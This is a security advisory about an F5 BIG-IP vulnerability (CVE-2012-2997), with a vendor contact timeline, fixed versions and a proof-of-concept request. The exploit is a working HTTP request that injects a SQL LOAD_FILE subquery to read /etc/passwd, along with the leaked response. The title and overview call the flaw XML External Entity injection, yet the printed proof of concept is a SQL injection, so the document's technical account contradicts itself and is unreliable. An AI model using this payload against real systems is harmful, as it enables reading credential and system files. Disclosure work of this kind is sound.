SEC Consult Vulnerability Lab Security Advisory < 20130122-0 >
=======================================================================
title: XML External Entity Injection (XXE)
product: F5 BIG-IP
vulnerable version: <=11.2.0
fixed version: 11.2.0 HF3
11.2.1 HF3
CVE number: CVE-2012-2997
impact: Medium
homepage: www.f5.com
found: 2012-09-03
by: S. Viehböck
SEC Consult Vulnerability Lab
=======================================================================
Vendor/product description:
---------------------------
"The BIG-IP product suite is a system of application delivery services that
work together on the same best-in-class hardware platform or software virtual
instance. From load balancing and service offloading to acceleration and
security, the BIG-IP system delivers agilityand ensures your applications
are fast, secure, and available."
URL: www.f5.com/products/big-ip/
Vulnerability overview/description:
-----------------------------------
An XML External Entity Injection (XXE) vulnerability exists in a BIG-IP
component. This enables an authenticated attacker to download arbitrary files
from the file system with the rights of the "apache" OS user. The BIG-IP
configuration even allows access to the critical /etc/shadow file which
contains the password hashes of users.
Proof of concept:
-----------------
The following exploit shows how files can be extracted from the file system:
POST /sam/admin/reports/php/saveSettings.php HTTP/1.1
Host: bigip
Cookie: BIGIPAuthCookie=*VALID_COOKIE*
Content-Length: 119
{
"id": 2,
"defaultQuery": "XX', ext1=(SELECT MID(LOAD_FILE('/etc/passwd'),0,60)) -- x"
}
Note: target fields are only VARCHAR(60) thus MID() is used for extracting
data.
A request to /sam/admin/reports/php/getSettings.php returns the data:
HTTP/1.1 200 OK
...
{success:true,totalCount:1,rows:[{"id":"2","user":"admin","defaultQuery":"XX","ext1":"root:x:0:0:root:\/root:\/bin\/bash\nbin:x:1:1:bin:\/bin:\/sbin\/nol","ext2":""}]}
Vulnerable / tested versions:
-----------------------------
The vulnerability has been verified to exist in the F5 BIG-IP version 11.2.0.
No modules have to be enabled for successful exploitation.
Vendor contact timeline:
------------------------
2012-09-07: Contacting vendor - reqesting PGP/SMIME key.
2012-09-07: Vendor provides case number and PGP key.
2012-09-11: Sending advisory draft and proof of concept.
2012-09-20: Vendor has a fix for the vulnerability - will be released "with different hot fixes for different releases".
2012-11-21: Vendor announces that fix will be provided with 11.2.0 HF3 and 11.2.1 HF3.
2013-01-22: SEC Consult releases coordinated security advisory.
Solution:
---------
Update to 11.2.0 HF3 or 11.2.1 HF3.
Patch information is also available at:
support.f5.com/kb/en-us/solutions/public/14000/100/sol14138.html
Workaround:
-----------
No workaround available.
Advisory URL:
--------------
www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
SEC Consult Unternehmensberatung GmbH
Office Vienna
Mooslackengasse 17
A-1190 Vienna
Austria
Tel.: +43 / 1 / 890 30 43 - 0
Fax.: +43 / 1 / 890 30 43 - 25
Mail: research at sec-consult dot com
www.sec-consult.com
EOF S. Viehböck / @2013